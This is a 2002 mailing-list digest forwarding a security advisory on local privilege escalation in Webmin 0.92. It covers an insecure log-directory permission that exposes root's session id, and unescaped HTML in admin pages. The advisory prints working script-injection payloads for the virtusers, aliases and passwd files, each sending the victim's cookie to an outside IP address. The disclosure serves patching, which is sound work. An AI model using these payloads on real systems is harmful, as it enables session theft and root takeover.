[The post mentions Webmin installed from RPM, but it's possible that
all Webmin 0.92 installations are vulnerable. Please upgrade if you
use Webmin -- Raju]
This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Return-Path: <[EMAIL PROTECTED]>
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Local privalege escalation issues with Webmin 0.92
Date: Thu, 21 Mar 2002 10:01:21 +1200 (NZST)
18-02-02 -- [EMAIL PROTECTED]
About Webmin:
-------------
"Webmin is a web-based interface for system administration for Unix. Using
any browser that supports tables and forms (and Java for the File Manager
module), you can setup user accounts, Apache, DNS, file sharing and so
on."
Problem #1:
-----------
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory.
This means that if command logging within webmin is enabled, any local
user
can read the /var/webmin/webmin.log file and retrieve the root users
sid (cookie session id).
It is trivial to then create a faked local cookie using this session-id,
and log directly into webmin as root.
Problem #2:
-----------
If a semi-trusted colleague is given a restricted level of
access to some Webmin functions, specifically sendmail, then
malicious code can be inserted into certain files
that would result in revealing roots webmin sid (cookie session id)
when the root user visits the related page in webmin.
Example Exploit:
----------------
Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>
Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>
Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML
interface (where the code being read in is not checked for HTML). An
example would be changing their
'real name' in /etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get
the idea.)
This same problem exists in pretty much most parts of webmin, where files
(or command output like 'ps') is
read in and displayed in the web interface.
Solution:
---------
Upgrade to the latest version of Webmin (0.93), which fixes these issues
(as well as a couple of others apparently).
Available from: http://www.webmin.com/download.html
Thanks to:
----------
Harry Metcalfe <[EMAIL PROTECTED]> - for giving me the original idea
about ways to steal cookies from webpages.
Jamie Cameron <[EMAIL PROTECTED]> - for listening to me and making an
effort to keep in touch as he fixed the problem(s).
------------------------------
End of this Digest
******************
--
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves
================================================
To subscribe, send email to [EMAIL PROTECTED] with subscribe in subject header
To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header
Archives are available at http://www.mail-archive.com/ilugd%40wpaa.org
=================================================
